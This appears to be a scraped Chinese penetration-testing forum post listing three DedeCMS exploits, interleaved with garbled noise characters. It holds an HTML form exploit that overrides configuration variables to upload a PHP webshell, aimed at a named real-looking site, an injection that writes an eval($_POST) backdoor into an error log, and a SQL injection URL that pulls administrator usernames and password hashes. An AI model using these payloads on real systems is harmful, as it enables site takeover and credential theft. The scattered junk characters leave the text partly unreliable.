' H/ C2 B5 J: M- g0 a
9 H) p) y/ j! p
1 ?! o/ G! v8 D4 S. q$ _
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞$ q1 u- v/ m3 f" {, F- w7 Z$ c
<html>0 _  l; s4 D1 h# K1 a) r
<head>' k. V( U$ }" l4 s
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
5 M4 G  c( b' U5 R1 L" @. ]; |</head>
1 C  N1 @( B- G. @, a  |4 y% A( a  A8 B<body style="FONT-SIZE: 9pt">
2 S4 h$ e! h& ]$ A9 p4 |---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
  X, w* s. l# Z- |<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>  X7 @$ E$ W* @6 Q
<input type='hidden' name='activepath' value='/data/cache/' />" [) m0 h* [' F8 c# z  r3 _
<input type='hidden' name='cfg_basedir' value='../../' />7 g  T* G* p9 @% A& D
<input type='hidden' name='cfg_imgtype' value='php' />; N" U2 l. g1 A6 |5 ]; p6 q9 z* u
<input type='hidden' name='cfg_not_allowall' value='txt' />+ d6 L- J8 S+ s3 p8 B
<input type='hidden' name='cfg_softtype' value='php' />) L* k: W$ J; s: ?% w! y7 \
<input type='hidden' name='cfg_mediatype' value='php' />
8 |1 E) S- D- _/ O% u$ @<input type='hidden' name='f' value='form1.enclosure' />
  ]  K. a: k1 I0 R$ N" ?<input type='hidden' name='job' value='upload' />
5 I' [0 _! p5 v2 ]<input type='hidden' name='newname' value='fly.php' />) c1 u: J' q& C8 X8 v: g3 l
Select U Shell <input type='file' name='uploadfile' size='25' />
' h: i  \2 B1 m6 S* @; O8 T3 W<input type='submit' name='sb1' value='确定' />& O$ f/ Q; k( i% F& r" M
</form>
# T6 w% G# Q1 w<br />It's just a exp for the bug of Dedecms V55...<br />
0 k" A6 o9 X# F: W* _3 G5 |Need register_globals = on...<br />. H1 ^# }7 R  O# h. r$ w0 j) N
Fun the game,get a webshell at /data/cache/fly.php...<br />
, N! k8 V- j) x</body>; A' X3 c& ]8 V# N+ n# x
</html>
/ `* `4 o+ c  W- i- m6 y  }4 h( V$ X5 [. k8 ?
6 s! z1 i, s  u( b* a

) O! N2 W. y- J; b
0 c! r" f; j3 A" d
( X; _0 A: }8 K* M0 U# v1 ]+ x1 U0 T3 k5 j" ?, {5 Q

" m0 _5 F4 m9 m. `' a  Z3 U3 O% K
  G' Y4 L4 ~# a  A( Y$ J, m  L, T6 N; o
3 k( g/ |- l# D  _" l  H( o! a. @* q  i3 q% P4 s. j% J
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞& m7 [$ k0 u1 ?
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
$ }- G4 a/ Y  K0 \1. 访问网址:4 L: W  W. F4 l# L0 N8 K3 Y
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% y0 A' p! m! ^4 L( {可看见错误信息
4 e6 q* G( R6 Q* v* ?- \
+ a0 }, p3 P# O. H" [2 Y, ~
7 [: U+ |1 d8 ~  C2 a! _1 e2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。" J+ m5 u' M% Z8 o4 ~0 A. x
int(3) Error: Illegal double '1024e1024' value found during parsing* o2 M7 u0 |. m3 V! P
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?># c3 P$ F- Z; w4 p5 \: m

6 }0 H5 @+ \* W4 r$ K$ `
% [- y* H& b4 i7 a3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是; L+ |% e# s% @
- o) T: L) @6 g; B
2 z) q& w3 a7 S
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>0 F) K. D6 o! d! x1 K+ _

6 Z- e! d' \9 w4 K" A/ C$ H, T2 j1 Y0 Z* {
按确定后的看到第2步骤的信息表示文件木马上传成功.3 ~# l& E/ T' N8 q+ @% w
( |, V0 O" {/ v) m/ N! W; S' M0 l" l
2 r' ?0 h1 x: E$ l  F: q
* j* t" L* V4 o9 Y+ A3 {( M4 |

. F" s& i( M7 ^' _) ^' W: Y4 h8 p
& \( D7 W# e  ]( m" u* H2 H7 X
* O8 u2 g7 p- f) j& j

0 x& [: c, j* `7 b' h  G0 y9 w% m3 g. a. F; g" n0 Y+ A# }' E% ~$ P

& K' b# l2 z2 k# y8 \1 Z( Y% I  x5 E

* l' u* F% `8 N. v% W- l3 y织梦(DedeCms)plus/infosearch.php 文件注入漏洞
# ]1 V, C) I. r2 K8 Shttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2